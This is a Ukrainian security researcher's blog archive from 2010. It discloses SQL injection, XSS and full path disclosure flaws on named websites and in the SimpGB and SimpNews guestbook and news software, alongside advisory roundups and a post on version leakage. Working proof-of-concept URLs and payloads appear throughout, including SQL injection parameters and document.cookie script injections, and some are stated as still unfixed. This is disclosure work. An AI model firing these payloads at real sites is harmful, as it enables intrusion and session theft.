Архів для категорії 'Уразливості'

Уразливості на www.dengi-info.com

15:28 19.07.2010

03.12.2009

У квітні, 17.04.2009, я знайшов SQL Injection та Cross-Site Scripting уразливості на проекті http://www.dengi-info.com (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

19.07.2010

SQL Injection:

http://www.dengi-info.com/archive/read.php?iid=-1%20or%20version()=5

http://www.dengi-info.com/news/?nid=-1%20or%20version()=5

XSS:

Дані уразливості досі не виправлені.

Добірка уразливостей

15:05 17.07.2010

В даній добірці уразливості в веб додатках:

  • Lotus Sametime User Enumeration Vulnerability (деталі)
  • Openpresse 1.01 Local File Include Vulnerability (деталі)
  • Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • Apple Safari local file theft vulnerability (деталі)
  • Apple Safari SVG Set.targetElement() Memory Corruption Vulnerability (деталі)
  • Apple WebKit attr() Invalid Attribute Memory Corruption Vulnerability (деталі)
  • Apple WebKit dir Attribute Freeing Dangling Object Pointer Vulnerability (деталі)
  • XSS vulnerability in Zikula Application Framework (деталі)
  • XSS vulnerability in Zikula Application Framework (деталі)

Уразливість на video.i.ua

15:29 16.07.2010

04.12.2009

У квітні, 17.04.2009, я знайшов Cross-Site Scripting уразливість на проекті http://video.i.ua (відео хостінг). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів i.ua я писав про уразливість на board.i.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.07.2010

XSS:

Це Strictly social XSS. Атака спрацює при кліку на “Мне 18″.

Дану уразливість виправили, але погано, тому при невеликій модифікації коду, вона знову працює.

XSS:

Добірка уразливостей

15:11 15.07.2010

В даній добірці уразливості в веб додатках:

  • New cacti packages fix missing input sanitising (деталі)
  • Apache ActiveMQ is prone to source code disclosure vulnerability (деталі)
  • Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • OpenCominterne 1.01 Local File Include Vulnerability (деталі)
  • In-portal 5.0.3 Remote Arbitrary File Upload Exploit (деталі)
  • IWD Group SQL Injection Vulnerabilities (деталі)
  • Apple Safari & Quicktime Denial of Service (деталі)
  • Multiple Vendor WebKit Error Handling Use After Free Vulnerability (деталі)
  • Apple Safari Remote Memory Corruption Vulnerability (деталі)
  • Apple Safari cross-domain XML theft vulnerability (деталі)

Нові уразливості в SimpGB

15:29 14.07.2010

01.06.2010

У жовтні, 26.10.2009, я знайшов Cross-Site Scripting уразливості в SimpGB (причому це persistent XSS). Дані уразливості я виявив на одному сайті, де використовується даний веб додаток. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

14.07.2010

XSS:

Це persistent XSS в трьох функціоналах веб додатку.

POST запит на сторінках:

http://site/guestbook.php?lang=en&mode=new&layout=default
http://site/guestbook.php?lang=en&mode=new&layout=default&quote=1
http://site/admin/usered.php?lang=en&mode=comment&input_entrynr=1&entrylang=en

<script>alert(document.cookie)</script>В полі АВТОР (Name).

[swf width=1 height=1]http://site/flash.swf[/swf]В полі ТЕКСТ (Text).

Атака можлива на старих версіях флеш плеєра, де була менш жорстка політика безпеки і можна було виконати JS-код з флешек з зовнішніх ресурсів. В 9 і наступних версіях флеш плеєра атака спрацює лише якщо swf-файл буде на тому самому домені.

Уразливі SimpGB V1.37.3 та попередні версії. Як я перевірив, в SimpGB v1.49.01 вже немає першої уразливості, але все ще є XSS через Flash.

Добірка уразливостей

15:28 13.07.2010

В даній добірці уразливості в веб додатках:

  • Численні уразливості безпеки в lcms (деталі)
  • Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • Apple Safari - Null pointer dereference (деталі)
  • Apple Safari - Information disclosure (деталі)
  • < Safari 3.2.3 Arbitrary Code Execution + PoC (деталі)
  • Apple Safari <v4 Remote code execution (деталі)
  • Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability (деталі)
  • A XSS in User_ChkLogin.asp of PowerEasy 2006 (деталі)
  • SmodCMS ‘config.php’ Arbitrary File Upload Vulnerability (деталі)
  • phpegasus ‘config.php’ Arbitrary File Upload Vulnerability (деталі)

Уразливості на adamant.ua

15:17 12.07.2010

05.12.2009

У квітні, 17.04.2009, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості на сайті http://adamant.ua (зокрема http://advert.adamant.ua). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно проектів компанії Адамант раніше я писав про уразливість на holms.adamant.ua.

Детальна інформація про уразливості з’явиться пізніше.

12.07.2010

SQL Injection:

http://advert.adamant.ua/www/delivery/ac.php?bannerid=-1%20or%20version()%3E4

Full path disclosure:

http://advert.adamant.ua/www/delivery/fc.php?MAX_type=1

XSS:

http://advert.adamant.ua/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Дані уразливості вже виправлені (за рахунок оновлення движка).

Добірка уразливостей

15:20 10.07.2010

В даній добірці уразливості в веб додатках:

  • Artofdefence Hyperguard Web Application Firewall: Remote Denial of Service (деталі)
  • CSRF in e107 (деталі)
  • Vbulletin - Two-Step External Link XSS (деталі)
  • Genera CMS Macro Web Media XSS Vulnerability (деталі)
  • IBM Tivoli Storage Manager Remote Agent Service Buffer Overflows (деталі)
  • Openregistrecil 1.02 (RFI/LFI) Multiple File Include Vulnerability (деталі)
  • phpBB2 Portal Mod XSS Vulnerability (деталі)
  • DBSite w/b CMS Multiple XSS Vulnerability (деталі)
  • Southern-Suzuki (Auth Bypass) Remote SQL Injection (деталі)
  • Пошкодження пам’яті в Apple iPhone (деталі)

Уразливості в SimpNews

15:04 09.07.2010

29.05.2010

У жовтні, 26.10.2009, я знайшов Full path disclosure та Cross-Site Scripting уразливості в SimpNews. Дані уразливості я виявив на www.boesch-it.de - офіційному сайті веб додатку. Про що найближчим часом повідомлю розробникам. Які також є розробниками SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

09.07.2010

Full path disclosure:

http://site/simpnews/news.php?lang=1&layout=layout2&sortorder=0&category=1

XSS:

http://site/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі SimpNews V2.47.03 та попередні версії. В версії SimpNews V2.48.01 дані уразливості були виправлені.

Витік інформації про версію системи №5

22:41 08.07.2010

Продовжу тему витоку інформації про версію системи. Як я зазначав, виведення версії системи - це поширена функція у веб додатках та веб системах. Багато різних движків виводять інформацію про версію системи і дана можливість движків є уразливістю. Це витік інформації (Information Leakage) про версію системи, що може бути використаний для атаки на сайти, що використовують даний движок.

Наведу нові приклади Information Leakage уразливостей в різних веб додатках (зокрема форумах), що приводять до витоку інформації про версію системи.

IPB

В IPB на кожній сторінці форуму виводиться версія системи (Powered by Invision Power Board v1.3).

phpBB

В phpBB версію системи можна дізнатися в файлах http://site/docs/CHANGELOG.html, http://site/docs/INSTALL.html та http://site/docs/README.html (phpBB 2.0.13).

vBulletin

В vBulletin на кожній сторінці форуму виводиться версія системи (Powered by vBulletin Version 3.8.2).

SMF

В SMF на кожній сторінці форуму виводиться версія системи (Powered by SMF 1.1.11).

YaBB

В YaBB на кожній сторінці форуму виводиться версія системи (Powered by YaBB 2.4).